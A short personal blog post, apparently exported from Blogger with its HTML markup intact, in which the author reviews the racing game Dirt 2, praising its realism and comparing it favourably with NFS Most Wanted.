/></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com22tag:blogger.com,1999:blog-7802132138133841506.post-39665461025307655902011-02-07T10:17:00.000-08:002011-09-08T13:28:02.687-07:00Dirt 2<div style="text-align: left;"><span class="Apple-style-span" >These days I've been playing Dirt 2 on my Acer Laptop which has 1GB dedicated NVIDIA GEFORCE GT420M graphics.<br />For me Dirt 2 is not bad but not good as NFS Most Wanted. I can say that Dirt 2 is the best racing game for me after NFS Most Wanted.</span></div><div style="text-align: left;"><span class="Apple-style-span" ><br /></span></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkNRoa4AsPvIxjy_uGvhTieP5P9o4pxdsJWr8FnbUu172WjIgWb5ZBl8elNx7VuI4OtPBR_Wq171dYy5MgYCNtwNYurqWfxtbU_CpleSTZI4V_jKTeEqzZFvtTRZ-Ipz1xPX_w9X4SS1k/s1600/colin-mcrae-dirt-2.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><span class="Apple-style-span" ><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 224px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkNRoa4AsPvIxjy_uGvhTieP5P9o4pxdsJWr8FnbUu172WjIgWb5ZBl8elNx7VuI4OtPBR_Wq171dYy5MgYCNtwNYurqWfxtbU_CpleSTZI4V_jKTeEqzZFvtTRZ-Ipz1xPX_w9X4SS1k/s400/colin-mcrae-dirt-2.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5571018814180711890" /></span></a><div style="text-align: center;"><span class="Apple-style-span" ><br /></span></div><div style="text-align: center;"><span class="Apple-style-span" ><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" >However the speciality of this game is it is realistic. How much I love MW I know that it is not real in world. But when I play Dirt 2 I feel that I am driving a real car. I can't accelerate and go as fast as I can. So this is one game which is realistic. Love to play it......</span></div><div style="text-align: left;"><span class="Apple-style-span" ><br /></span></div><div><img src="http://img1.cache.netease.com/catchpic/0/05/0553799FE8E04D7AC5BCD72E5A228BCB.jpg" style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 500px; height: 375px;" border="0" alt="" /></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0